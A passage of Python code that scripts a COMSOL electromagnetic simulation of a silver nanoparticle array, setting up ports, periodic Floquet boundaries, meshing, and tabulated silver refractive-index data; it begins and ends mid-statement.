model.java.component(\"comp1\").physics(\"ewfd\").feature(\"wee2\").selection().named(\n f\"{nano_particle_handle}_dom\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").create(\"port1\", \"Port\", Integer(2))\n 
model.java.component(\"comp1\").physics(\"ewfd\").feature(\"port1\").selection().set(68)\n model.java.component(\"comp1\").physics(\"ewfd\").create(\"port2\", \"Port\", Integer(2))\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"port2\").selection().set(62)\n model.java.component(\"comp1\").physics(\"ewfd\").create(\n \"pc1\", \"PeriodicCondition\", Integer(2)\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"pc1\").selection().named(\n \"geom1_sel_pc1\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").create(\n \"pc2\", \"PeriodicCondition\", Integer(2)\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"pc2\").selection().named(\n \"geom1_sel_pc2\"\n )\n model.java.component(\"comp1\").physics().create(\n \"ewfd2\", \"ElectromagneticWavesFrequencyDomain\", \"geom1\"\n )\n\n model.java.component(\"comp1\").mesh(\"mesh1\").create(\"size1\", \"Size\")\n model.java.component(\"comp1\").mesh(\"mesh1\").create(\"size2\", \"Size\")\n model.java.component(\"comp1\").mesh(\"mesh1\").create(\"ftri1\", \"FreeTri\")\n model.java.component(\"comp1\").mesh(\"mesh1\").create(\"ftet1\", \"FreeTet\")\n model.java.component(\"comp1\").mesh(\"mesh1\").create(\"swe1\", \"Sweep\")\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"size1\").selection().named(\n f\"{nano_particle_handle}_dom\"\n )\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"size2\").selection().geom(\n \"geom1\", Integer(3)\n )\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"size2\").selection().set(18)\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"ftri1\").selection().named(\n \"geom1_sel_ftri1\"\n )\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"ftet1\").selection().named(\n \"geom1_csel1_dom\"\n )\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"swe1\").create(\n \"dis1\", \"Distribution\"\n )\n\n model.java.result().table(\"tbl2\").comments(\"LightToHeat\")\n\n model.java.component(\"comp1\").material(\"mat1\").label(\"Air\")\n model.java.component(\"comp1\").material(\"mat1\").propertyGroup(\"RefractiveIndex\").set(\n \"n\", [\"na\", \"0\", \"0\", \"0\", \"na\", \"0\", \"0\", \"0\", \"na\"]\n )\n model.java.component(\"comp1\").material(\"mat2\").label(\"Substrate\")\n model.java.component(\"comp1\").material(\"mat2\").propertyGroup(\"RefractiveIndex\").set(\n \"n\", [\"nb\", \"0\", \"0\", \"0\", \"nb\", \"0\", \"0\", \"0\", \"nb\"]\n )\n model.java.component(\"comp1\").material(\"mat5\").label(\n \"Ag (Silver) (Rakic et al. 
1998: Brendel-Bormann model n,k 0.248-12.4 um)\"\n )\n model.java.component(\"comp1\").material(\"mat5\").propertyGroup(\n \"RefractiveIndex\"\n ).func(\"int1\").set(\"funcname\", \"nr\")\n model.java.component(\"comp1\").material(\"mat5\").propertyGroup(\n \"RefractiveIndex\"\n ).func(\"int1\").set(\n \"table\",\n [\n [\"2.4797e-01\", \"8.4863e-01\"],\n [\"2.5289e-01\", \"8.2493e-01\"],\n [\"2.5791e-01\", \"7.9699e-01\"],\n [\"2.6303e-01\", \"8.0009e-01\"],\n [\"2.6825e-01\", \"8.7536e-01\"],\n [\"2.7358e-01\", \"1.0320e+00\"],\n [\"2.7901e-01\", \"1.2351e+00\"],\n [\"2.8455e-01\", \"1.4245e+00\"],\n [\"2.9020e-01\", \"1.5424e+00\"],\n [\"2.9596e-01\", \"1.5549e+00\"],\n [\"3.0184e-01\", \"1.4594e+00\"],\n [\"3.0783e-01\", \"1.2767e+00\"],\n [\"3.1394e-01\", \"1.0361e+00\"],\n [\"3.2017e-01\", \"7.6783e-01\"],\n [\"3.2653e-01\", \"5.2213e-01\"],\n [\"3.3301e-01\", \"3.6378e-01\"],\n [\"3.3962e-01\", \"2.7960e-01\"],\n [\"3.4637e-01\", \"2.3178e-01\"],\n [\"3.5324e-01\", \"2.0172e-01\"],\n [\"3.6025e-01\", \"1.8151e-01\"],\n [\"3.6741e-01\", \"1.6741e-01\"],\n [\"3.7470e-01\", \"1.5739e-01\"],\n [\"3.8214e-01\", \"1.5021e-01\"],\n [\"3.8973e-01\", \"1.4506e-01\"],\n [\"3.9746e-01\", \"1.4141e-01\"],\n [\"4.0535e-01\", \"1.3887e-01\"],\n [\"4.1340e-01\", \"1.3716e-01\"],\n [\"4.2161e-01\", \"1.3609e-01\"],\n [\"4.2998e-01\", \"1.3550e-01\"],\n [\"4.3852e-01\", \"1.3529e-01\"],\n [\"4.4722e-01\", \"1.3537e-01\"],\n [\"4.5610e-01\", \"1.3569e-01\"],\n [\"4.6515e-01\", \"1.3621e-01\"],\n [\"4.7439e-01\", \"1.3687e-01\"],\n [\"4.8381e-01\", \"1.3767e-01\"],\n [\"4.9341e-01\", \"1.3857e-01\"],\n [\"5.0321e-01\", \"1.3958e-01\"],\n [\"5.1320e-01\", \"1.4067e-01\"],\n [\"5.2339e-01\", \"1.4184e-01\"],\n [\"5.3378e-01\", \"1.4308e-01\"],\n [\"5.4437e-01\", \"1.4440e-01\"],\n [\"5.5518e-01\", \"1.4578e-01\"],\n [\"5.6620e-01\", \"1.4723e-01\"],\n [\"5.7744e-01\", \"1.4875e-01\"],\n [\"5.8891e-01\", \"1.5034e-01\"],\n [\"6.0060e-01\", \"1.5200e-01\"],\n [\"6.1252e-01\", \"1.5373e-01\"],\n [\"6.2468e-01\", \"1.5554e-01\"],\n [\"6.3709e-01\", \"1.5742e-01\"],\n [\"6.4973e-01\", \"1.5939e-01\"],\n [\"6.6263e-01\", \"1.6143e-01\"],\n [\"6.7579e-01\", \"1.6356e-01\"],\n [\"6.8920e-01\", \"1.6579e-01\"],\n [\"7.0289e-01\", \"1.6810e-01\"],\n [\"7.1684e-01\", \"1.7051e-01\"],\n [\"7.3107e-01\", \"1.7303e-01\"],\n [\"7.4559e-01\", \"1.7565e-01\"],\n [\"7.6039e-01\", \"1.7838e-01\"],\n [\"7.7549e-01\", \"1.8123e-01\"],\n [\"7.9088e-01\", \"1.8420e-01\"],\n [\"8.0658e-01\", \"1.8729e-01\"],\n [\"8.2260e-01\", \"1.9051e-01\"],\n [\"8.3893e-01\", \"1.9387e-01\"],\n [\"8.5558e-01\", \"1.9737e-01\"],\n [\"8.7257e-01\", \"2.0102e-01\"],\n [\"8.8989e-01\", \"2.0482e-01\"],\n [\"9.0756e-01\", \"2.0878e-01\"],\n [\"9.2557e-01\", \"2.1291e-01\"],\n [\"9.4395e-01\", \"2.1721e-01\"],\n [\"9.6269e-01\", \"2.2169e-01\"],\n [\"9.8180e-01\", \"2.2636e-01\"],\n [\"1.0013e+00\", \"2.3122e-01\"],\n [\"1.0212e+00\", \"2.3628e-01\"],\n [\"1.0414e+00\", \"2.4155e-01\"],\n [\"1.0621e+00\", \"2.4705e-01\"],\n [\"1.0832e+00\", \"2.5277e-01\"],\n [\"1.1047e+00\", \"2.5872e-01\"],\n [\"1.1266e+00\", \"2.6493e-01\"],\n [\"1.1490e+00\", \"2.7138e-01\"],\n [\"1.1718e+00\", \"2.7811e-01\"],\n [\"1.1951e+00\", \"2.8511e-01\"],\n [\"1.2188e+00\", \"2.9239e-01\"],\n [\"1.2430e+00\", \"2.9998e-01\"],\n [\"1.2677e+00\", \"3.0788e-01\"],\n [\"1.2929e+00\", \"3.1609e-01\"],\n [\"1.3185e+00\", \"3.2465e-01\"],\n [\"1.3447e+00\", \"3.3355e-01\"],\n [\"1.3714e+00\", \"3.4281e-01\"],\n [\"1.3986e+00\", \"3.5245e-01\"],\n [\"1.4264e+00\", 
\"3.6249e-01\"],\n [\"1.4547e+00\", \"3.7292e-01\"],\n [\"1.4836e+00\", \"3.8379e-01\"],\n [\"1.5130e+00\", \"3.9509e-01\"],\n [\"1.5431e+00\", \"4.0684e-01\"],\n [\"1.5737e+00\", \"4.1908e-01\"],\n [\"1.6050e+00\", \"4.3180e-01\"],\n [\"1.6368e+00\", \"4.4504e-01\"],\n [\"1.6693e+00\", \"4.5882e-01\"],\n [\"1.7025e+00\", \"4.7314e-01\"],\n [\"1.7363e+00\", \"4.8805e-01\"],\n [\"1.7707e+00\", \"5.0355e-01\"],\n [\"1.8059e+00\", \"5.1967e-01\"],\n [\"1.8417e+00\", \"5.3644e-01\"],\n [\"1.8783e+00\", \"5.5389e-01\"],\n [\"1.9156e+00\", \"5.7203e-01\"],\n [\"1.9536e+00\", \"5.9090e-01\"],\n [\"1.9924e+00\", \"6.1053e-01\"],\n [\"2.0319e+00\", \"6.3094e-01\"],\n [\"2.0723e+00\", \"6.5216e-01\"],\n [\"2.1134e+00\", \"6.7424e-01\"],\n [\"2.1554e+00\", \"6.9719e-01\"],\n [\"2.1982e+00\", \"7.2106e-01\"],\n [\"2.2418e+00\", \"7.4588e-01\"],\n [\"2.2863e+00\", \"7.7170e-01\"],\n [\"2.3317e+00\", \"7.9854e-01\"],\n [\"2.3780e+00\", \"8.2645e-01\"],\n [\"2.4252e+00\", \"8.5546e-01\"],\n [\"2.4734e+00\", \"8.8564e-01\"],\n [\"2.5225e+00\", \"9.1701e-01\"],\n [\"2.5725e+00\", \"9.4962e-01\"],\n [\"2.6236e+00\", \"9.8353e-01\"],\n [\"2.6757e+00\", \"1.0188e+00\"],\n [\"2.7288e+00\", \"1.0554e+00\"],\n [\"2.7830e+00\", \"1.0935e+00\"],\n [\"2.8383e+00\", \"1.1332e+00\"],\n [\"2.8946e+00\", \"1.1743e+00\"],\n [\"2.9521e+00\", \"1.2171e+00\"],\n [\"3.0107e+00\", \"1.2616e+00\"],\n [\"3.0704e+00\", \"1.3079e+00\"],\n [\"3.1314e+00\", \"1.3560e+00\"],\n [\"3.1936e+00\", \"1.4060e+00\"],\n [\"3.2570e+00\", \"1.4579e+00\"],\n [\"3.3216e+00\", \"1.5119e+00\"],\n [\"3.3876e+00\", \"1.5680e+00\"],\n [\"3.4548e+00\", \"1.6263e+00\"],\n [\"3.5234e+00\", \"1.6869e+00\"],\n [\"3.5934e+00\", \"1.7499e+00\"],\n [\"3.6647e+00\", \"1.8153e+00\"],\n [\"3.7375e+00\", \"1.8833e+00\"],\n [\"3.8117e+00\", \"1.9540e+00\"],\n [\"3.8873e+00\", \"2.0274e+00\"],\n [\"3.9645e+00\", \"2.1036e+00\"],\n [\"4.0432e+00\", \"2.1829e+00\"],\n [\"4.1235e+00\", \"2.2652e+00\"],\n [\"4.2053e+00\", \"2.3507e+00\"],\n [\"4.2888e+00\", \"2.4396e+00\"],\n [\"4.3740e+00\", \"2.5319e+00\"],\n [\"4.4608e+00\", \"2.6277e+00\"],\n [\"4.5494e+00\", \"2.7273e+00\"],\n [\"4.6397e+00\", \"2.8307e+00\"],\n [\"4.7318e+00\", \"2.9381e+00\"],\n [\"4.8257e+00\", \"3.0496e+00\"],\n [\"4.9216e+00\", \"3.1654e+00\"],\n [\"5.0193e+00\", \"3.2856e+00\"],\n [\"5.1189e+00\", \"3.4104e+00\"],\n [\"5.2205e+00\", \"3.5400e+00\"],\n [\"5.3242e+00\", \"3.6745e+00\"],\n [\"5.4299e+00\", \"3.8141e+00\"],\n [\"5.5377e+00\", \"3.9591e+00\"],\n [\"5.6476e+00\", \"4.1095e+00\"],\n [\"5.7597e+00\", \"4.2656e+00\"],\n [\"5.8741e+00\", \"4.4275e+00\"],\n [\"5.9907e+00\", \"4.5956e+00\"],\n [\"6.1096e+00\", \"4.7699e+00\"],\n [\"6.2309e+00\", \"4.9508e+00\"],\n [\"6.3546e+00\", \"5.1384e+00\"],\n [\"6.4808e+00\", \"5.3329e+00\"],\n [\"6.6094e+00\", \"5.5347e+00\"],\n [\"6.7407e+00\", \"5.7439e+00\"],\n [\"6.8745e+00\", \"5.9609e+00\"],\n [\"7.0110e+00\", \"6.1857e+00\"],\n [\"7.1502e+00\", \"6.4188e+00\"],\n [\"7.2921e+00\", \"6.6604e+00\"],\n [\"7.4369e+00\", \"6.9107e+00\"],\n [\"7.5845e+00\", \"7.1701e+00\"],\n [\"7.7351e+00\", \"7.4389e+00\"],\n [\"7.8887e+00\", \"7.7172e+00\"],\n [\"8.0453e+00\", \"8.0055e+00\"],\n [\"8.2050e+00\", \"8.3040e+00\"],\n [\"8.3679e+00\", \"8.6131e+00\"],\n [\"8.5340e+00\", \"8.9330e+00\"],\n [\"8.7034e+00\", \"9.2642e+00\"],\n [\"8.8762e+00\", \"9.6068e+00\"],\n [\"9.0524e+00\", \"9.9614e+00\"],\n [\"9.2322e+00\", \"1.0328e+01\"],\n [\"9.4154e+00\", \"1.0707e+01\"],\n [\"9.6024e+00\", \"1.1100e+01\"],\n [\"9.7930e+00\", \"1.1505e+01\"],\n 
[\"9.9874e+00\", \"1.1924e+01\"],\n [\"1.0186e+01\", \"1.2357e+01\"],\n [\"1.0388e+01\", \"1.2805e+01\"],\n [\"1.0594e+01\", \"1.3267e+01\"],\n [\"1.0804e+01\", \"1.3744e+01\"],\n [\"1.1019e+01\", \"1.4237e+01\"],\n [\"1.1238e+01\", \"1.4746e+01\"],\n [\"1.1461e+01\", \"1.5270e+01\"],\n [\"1.1688e+01\", \"1.5812e+01\"],\n [\"1.1920e+01\", \"1.6370e+01\"],\n [\"1.2157e+01\", \"1.6946e+01\"],\n [\"1.2398e+01\", \"1.7540e+01\"],\n ],\n )\n model.java.component(\"comp1\").material(\"mat5\").propertyGroup(\n \"RefractiveIndex\"\n ).func(\"int1\").set(\"fununit\", [\"1\"])\n model.java.component(\"comp1\").material(\"mat5\").propertyGroup(\n \"RefractiveIndex\"\n ).func(\"int1\").set(\"argunit\", [\"um\"])\n model.java.component(\"comp1\").material(\"mat5\").propertyGroup(\n \"RefractiveIndex\"\n ).func(\"int2\").set(\"funcname\", \"ni\")\n model.java.component(\"comp1\").material(\"mat5\").propertyGroup(\n \"RefractiveIndex\"\n ).func(\"int2\").set(\n \"table\",\n [\n [\"2.4797e-01\", \"1.1920e+00\"],\n [\"2.5289e-01\", \"1.2193e+00\"],\n [\"2.5791e-01\", \"1.2844e+00\"],\n [\"2.6303e-01\", \"1.3955e+00\"],\n [\"2.6825e-01\", \"1.5246e+00\"],\n [\"2.7358e-01\", \"1.6142e+00\"],\n [\"2.7901e-01\", \"1.6125e+00\"],\n [\"2.8455e-01\", \"1.5017e+00\"],\n [\"2.9020e-01\", \"1.3028e+00\"],\n [\"2.9596e-01\", \"1.0631e+00\"],\n [\"3.0184e-01\", \"8.3581e-01\"],\n [\"3.0783e-01\", \"6.6203e-01\"],\n [\"3.1394e-01\", \"5.6621e-01\"],\n [\"3.2017e-01\", \"5.6549e-01\"],\n [\"3.2653e-01\", \"6.7421e-01\"],\n [\"3.3301e-01\", \"8.4735e-01\"],\n [\"3.3962e-01\", \"1.0142e+00\"],\n [\"3.4637e-01\", \"1.1589e+00\"],\n [\"3.5324e-01\", \"1.2860e+00\"],\n [\"3.6025e-01\", \"1.4005e+00\"],\n [\"3.6741e-01\", \"1.5059e+00\"],\n [\"3.7470e-01\", \"1.6045e+00\"],\n [\"3.8214e-01\", \"1.6979e+00\"],\n [\"3.8973e-01\", \"1.7873e+00\"],\n [\"3.9746e-01\", \"1.8736e+00\"],\n [\"4.0535e-01\", \"1.9574e+00\"],\n [\"4.1340e-01\", \"2.0394e+00\"],\n [\"4.2161e-01\", \"2.1200e+00\"],\n [\"4.2998e-01\", \"2.1995e+00\"],\n [\"4.3852e-01\", \"2.2782e+00\"],\n [\"4.4722e-01\", \"2.3564e+00\"],\n [\"4.5610e-01\", \"2.4344e+00\"],\n [\"4.6515e-01\", \"2.5122e+00\"],\n [\"4.7439e-01\", \"2.5901e+00\"],\n [\"4.8381e-01\", \"2.6682e+00\"],\n [\"4.9341e-01\", \"2.7466e+00\"],\n [\"5.0321e-01\", \"2.8254e+00\"],\n [\"5.1320e-01\", \"2.9048e+00\"],\n [\"5.2339e-01\", \"2.9848e+00\"],\n [\"5.3378e-01\", \"3.0656e+00\"],\n [\"5.4437e-01\", \"3.1471e+00\"],\n [\"5.5518e-01\", \"3.2295e+00\"],\n [\"5.6620e-01\", \"3.3128e+00\"],\n [\"5.7744e-01\", \"3.3971e+00\"],\n [\"5.8891e-01\", \"3.4825e+00\"],\n [\"6.0060e-01\", \"3.5690e+00\"],\n [\"6.1252e-01\", \"3.6567e+00\"],\n [\"6.2468e-01\", \"3.7455e+00\"],\n [\"6.3709e-01\", \"3.8357e+00\"],\n [\"6.4973e-01\", \"3.9272e+00\"],\n [\"6.6263e-01\", \"4.0200e+00\"],\n [\"6.7579e-01\", \"4.1143e+00\"],\n [\"6.8920e-01\", \"4.2100e+00\"],\n [\"7.0289e-01\", \"4.3072e+00\"],\n [\"7.1684e-01\", \"4.4061e+00\"],\n [\"7.3107e-01\", \"4.5065e+00\"],\n [\"7.4559e-01\", \"4.6085e+00\"],\n [\"7.6039e-01\", \"4.7123e+00\"],\n [\"7.7549e-01\", \"4.8178e+00\"],\n [\"7.9088e-01\", \"4.9251e+00\"],\n [\"8.0658e-01\", \"5.0343e+00\"],\n [\"8.2260e-01\", \"5.1453e+00\"],\n [\"8.3893e-01\", \"5.2583e+00\"],\n [\"8.5558e-01\", \"5.3732e+00\"],\n [\"8.7257e-01\", \"5.4902e+00\"],\n [\"8.8989e-01\", \"5.6093e+00\"],\n [\"9.0756e-01\", \"5.7304e+00\"],\n [\"9.2557e-01\", \"5.8538e+00\"],\n [\"9.4395e-01\", \"5.9793e+00\"],\n [\"9.6269e-01\", \"6.1072e+00\"],\n [\"9.8180e-01\", \"6.2373e+00\"],\n [\"1.0013e+00\", 
\"6.3699e+00\"],\n [\"1.0212e+00\", \"6.5048e+00\"],\n [\"1.0414e+00\", \"6.6423e+00\"],\n [\"1.0621e+00\", \"6.7823e+00\"],\n [\"1.0832e+00\", \"6.9248e+00\"],\n [\"1.1047e+00\", \"7.0700e+00\"],\n [\"1.1266e+00\", \"7.2179e+00\"],\n [\"1.1490e+00\", \"7.3686e+00\"],\n [\"1.1718e+00\", \"7.5221e+00\"],\n [\"1.1951e+00\", \"7.6785e+00\"],\n [\"1.2188e+00\", \"7.8378e+00\"],\n [\"1.2430e+00\", \"8.0001e+00\"],\n [\"1.2677e+00\", \"8.1654e+00\"],\n [\"1.2929e+00\", \"8.3339e+00\"],\n [\"1.3185e+00\", \"8.5056e+00\"],\n [\"1.3447e+00\", \"8.6805e+00\"],\n [\"1.3714e+00\", \"8.8587e+00\"],\n [\"1.3986e+00\", \"9.0403e+00\"],\n [\"1.4264e+00\", \"9.2254e+00\"],\n [\"1.4547e+00\", \"9.4140e+00\"],\n [\"1.4836e+00\", \"9.6062e+00\"],\n [\"1.5130e+00\", \"9.8021e+00\"],\n [\"1.5431e+00\", \"1.0002e+01\"],\n [\"1.5737e+00\", \"1.0205e+01\"],\n [\"1.6050e+00\", \"1.0412e+01\"],\n [\"1.6368e+00\", \"1.0624e+01\"],\n [\"1.6693e+00\", \"1.0839e+01\"],\n [\"1.7025e+00\", \"1.1059e+01\"],\n [\"1.7363e+00\", \"1.1282e+01\"],\n [\"1.7707e+00\", \"1.1510e+01\"],\n [\"1.8059e+00\", \"1.1743e+01\"],\n [\"1.8417e+00\", \"1.1979e+01\"],\n [\"1.8783e+00\", \"1.2221e+01\"],\n [\"1.9156e+00\", \"1.2467e+01\"],\n [\"1.9536e+00\", \"1.2718e+01\"],\n [\"1.9924e+00\", \"1.2973e+01\"],\n [\"2.0319e+00\", \"1.3234e+01\"],\n [\"2.0723e+00\", \"1.3499e+01\"],\n [\"2.1134e+00\", \"1.3770e+01\"],\n [\"2.1554e+00\", \"1.4046e+01\"],\n [\"2.1982e+00\", \"1.4327e+01\"],\n [\"2.2418e+00\", \"1.4614e+01\"],\n [\"2.2863e+00\", \"1.4906e+01\"],\n [\"2.3317e+00\", \"1.5203e+01\"],\n [\"2.3780e+00\", \"1.5507e+01\"],\n [\"2.4252e+00\", \"1.5816e+01\"],\n [\"2.4734e+00\", \"1.6131e+01\"],\n [\"2.5225e+00\", \"1.6453e+01\"],\n [\"2.5725e+00\", \"1.6780e+01\"],\n [\"2.6236e+00\", \"1.7114e+01\"],\n [\"2.6757e+00\", \"1.7454e+01\"],\n [\"2.7288e+00\", \"1.7801e+01\"],\n [\"2.7830e+00\", \"1.8154e+01\"],\n [\"2.8383e+00\", \"1.8514e+01\"],\n [\"2.8946e+00\", \"1.8881e+01\"],\n [\"2.9521e+00\", \"1.9255e+01\"],\n [\"3.0107e+00\", \"1.9636e+01\"],\n [\"3.0704e+00\", \"2.0025e+01\"],\n [\"3.1314e+00\", \"2.0421e+01\"],\n [\"3.1936e+00\", \"2.0824e+01\"],\n [\"3.2570e+00\", \"2.1235e+01\"],\n [\"3.3216e+00\", \"2.1654e+01\"],\n [\"3.3876e+00\", \"2.2081e+01\"],\n [\"3.4548e+00\", \"2.2516e+01\"],\n [\"3.5234e+00\", \"2.2959e+01\"],\n [\"3.5934e+00\", \"2.3410e+01\"],\n [\"3.6647e+00\", \"2.3870e+01\"],\n [\"3.7375e+00\", \"2.4339e+01\"],\n [\"3.8117e+00\", \"2.4817e+01\"],\n [\"3.8873e+00\", \"2.5303e+01\"],\n [\"3.9645e+00\", \"2.5799e+01\"],\n [\"4.0432e+00\", \"2.6304e+01\"],\n [\"4.1235e+00\", \"2.6818e+01\"],\n [\"4.2053e+00\", \"2.7342e+01\"],\n [\"4.2888e+00\", \"2.7876e+01\"],\n [\"4.3740e+00\", \"2.8419e+01\"],\n [\"4.4608e+00\", \"2.8973e+01\"],\n [\"4.5494e+00\", \"2.9537e+01\"],\n [\"4.6397e+00\", \"3.0111e+01\"],\n [\"4.7318e+00\", \"3.0696e+01\"],\n [\"4.8257e+00\", \"3.1291e+01\"],\n [\"4.9216e+00\", \"3.1898e+01\"],\n [\"5.0193e+00\", \"3.2515e+01\"],\n [\"5.1189e+00\", \"3.3143e+01\"],\n [\"5.2205e+00\", \"3.3783e+01\"],\n [\"5.3242e+00\", \"3.4435e+01\"],\n [\"5.4299e+00\", \"3.5098e+01\"],\n [\"5.5377e+00\", \"3.5773e+01\"],\n [\"5.6476e+00\", \"3.6460e+01\"],\n [\"5.7597e+00\", \"3.7159e+01\"],\n [\"5.8741e+00\", \"3.7870e+01\"],\n [\"5.9907e+00\", \"3.8594e+01\"],\n [\"6.1096e+00\", \"3.9331e+01\"],\n [\"6.2309e+00\", \"4.0080e+01\"],\n [\"6.3546e+00\", \"4.0842e+01\"],\n [\"6.4808e+00\", \"4.1618e+01\"],\n [\"6.6094e+00\", \"4.2407e+01\"],\n [\"6.7407e+00\", \"4.3209e+01\"],\n [\"6.8745e+00\", \"4.4025e+01\"],\n 
[\"7.0110e+00\", \"4.4854e+01\"],\n [\"7.1502e+00\", \"4.5697e+01\"],\n [\"7.2921e+00\", \"4.6555e+01\"],\n [\"7.4369e+00\", \"4.7426e+01\"],\n [\"7.5845e+00\", \"4.8312e+01\"],\n [\"7.7351e+00\", \"4.9212e+01\"],\n [\"7.8887e+00\", \"5.0126e+01\"],\n [\"8.0453e+00\", \"5.1055e+01\"],\n [\"8.2050e+00\", \"5.1999e+01\"],\n [\"8.3679e+00\", \"5.2958e+01\"],\n [\"8.5340e+00\", \"5.3931e+01\"],\n [\"8.7034e+00\", \"5.4920e+01\"],\n [\"8.8762e+00\", \"5.5923e+01\"],\n [\"9.0524e+00\", \"5.6942e+01\"],\n [\"9.2322e+00\", \"5.7976e+01\"],\n [\"9.4154e+00\", \"5.9025e+01\"],\n [\"9.6024e+00\", \"6.0090e+01\"],\n [\"9.7930e+00\", \"6.1170e+01\"],\n [\"9.9874e+00\", \"6.2265e+01\"],\n [\"1.0186e+01\", \"6.3376e+01\"],\n [\"1.0388e+01\", \"6.4502e+01\"],\n [\"1.0594e+01\", \"6.5643e+01\"],\n [\"1.0804e+01\", \"6.6800e+01\"],\n [\"1.1019e+01\", \"6.7973e+01\"],\n [\"1.1238e+01\", \"6.9160e+01\"],\n [\"1.1461e+01\", \"7.0363e+01\"],\n [\"1.1688e+01\", \"7.1581e+01\"],\n [\"1.1920e+01\", \"7.2814e+01\"],\n [\"1.2157e+01\", \"7.4063e+01\"],\n [\"1.2398e+01\", \"7.5326e+01\"],\n ],\n )\n\n model.java.component(\"comp1\").material(\"mat5\").propertyGroup(\n \"RefractiveIndex\"\n ).func(\"int2\").set(\"fununit\", [\"1\"])\n model.java.component(\"comp1\").material(\"mat5\").propertyGroup(\n \"RefractiveIndex\"\n ).func(\"int2\").set(\"argunit\", [\"um\"])\n model.java.component(\"comp1\").material(\"mat5\").propertyGroup(\"RefractiveIndex\").set(\n \"n\",\n [\n \"nr(c_const/freq)\",\n \"0\",\n \"0\",\n \"0\",\n \"nr(c_const/freq)\",\n \"0\",\n \"0\",\n \"0\",\n \"nr(c_const/freq)\",\n ],\n )\n model.java.component(\"comp1\").material(\"mat5\").propertyGroup(\"RefractiveIndex\").set(\n \"ki\",\n [\n \"ni(c_const/freq)\",\n \"0\",\n \"0\",\n \"0\",\n \"ni(c_const/freq)\",\n \"0\",\n \"0\",\n \"0\",\n \"ni(c_const/freq)\",\n ],\n )\n model.java.component(\"comp1\").material(\"mat5\").propertyGroup(\n \"RefractiveIndex\"\n ).addInput(\"frequency\")\n\n model.java.component(\"comp1\").cpl(\"intop1\").set(\"opname\", \"intop_vol\")\n model.java.component(\"comp1\").cpl(\"intop2\").set(\"opname\", \"intop_surf\")\n\n model.java.component(\"comp1\").coordSystem(\"pml1\").set(\"wavelengthSource\", \"ewfd2\")\n\n model.java.common(\"cminpt\").set(\"modified\", [[\"frequency\", \"563.5 [THz]\"]])\n\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"wee1\").set(\n \"DisplacementFieldModel\", \"RelativePermittivity\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"wee1\").set(\n \"omegap\", \"13.8*10^15\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"wee1\").set(\"f\", Integer(1))\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"wee1\").set(\n \"omega0\", \"400[THz]\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"wee1\").set(\n \"epsilonr_mat\", \"userdef\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"wee1\").set(\n \"epsilonr\", [[0.054007], [0], [0], [0], [0.054007], [0], [0], [0], [0.054007]]\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"wee1\").set(\n \"epsilonInf_mat\", \"from_mat\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"wee1\").set(\n \"mur_mat\", \"userdef\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"wee1\").set(\n \"sigma_mat\", \"userdef\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"wee1\").set(\n \"sigma\",\n [[\"45e6\"], [\"0\"], [\"0\"], [\"0\"], [\"45e6\"], [\"0\"], [\"0\"], [\"0\"], [\"45e6\"]],\n )\n 
model.java.component(\"comp1\").physics(\"ewfd\").feature(\"wee2\").set(\n \"n\", [[\"na\"], [\"0\"], [\"0\"], [\"0\"], [\"na\"], [\"0\"], [\"0\"], [\"0\"], [\"na\"]]\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"port1\").set(\"Pin\", \"P\")\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"port1\").set(\n \"PortType\", \"Periodic\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"port1\").set(\n \"Eampl\", [[\"E0x\"], [\"E0y\"], [\"0\"]]\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"port1\").set(\n \"alpha1_inc\", \"theta\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"port1\").set(\n \"alpha2_inc\", \"phi\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"port1\").set(\n \"n\", [[\"na\"], [\"0\"], [\"0\"], [\"0\"], [\"na\"], [\"0\"], [\"0\"], [\"0\"], [\"na\"]]\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"port2\").set(\n \"PortType\", \"Periodic\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"port2\").set(\n \"Eampl\", [[\"E0x\"], [\"E0y\"], [\"0\"]]\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"port2\").set(\n \"n\", [[\"nb\"], [\"0\"], [\"0\"], [\"0\"], [\"nb\"], [\"0\"], [\"0\"], [\"0\"], [\"nb\"]]\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"pc1\").set(\n \"PeriodicType\", \"Floquet\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"pc1\").set(\n \"Floquet_source\", \"FromPeriodicPort\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"pc2\").set(\n \"PeriodicType\", \"Floquet\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").feature(\"pc2\").set(\n \"Floquet_source\", \"FromPeriodicPort\"\n )\n model.java.component(\"comp1\").physics(\"ewfd2\").prop(\"BackgroundField\").set(\n \"SolveFor\", \"scatteredField\"\n )\n model.java.component(\"comp1\").physics(\"ewfd2\").prop(\"BackgroundField\").set(\n \"Eb\", [[\"ewfd.Ex\"], [\"ewfd.Ey\"], [\"ewfd.Ez\"]]\n )\n model.java.component(\"comp1\").physics(\"ewfd2\").feature(\"wee1\").set(\n \"DisplacementFieldModel\", 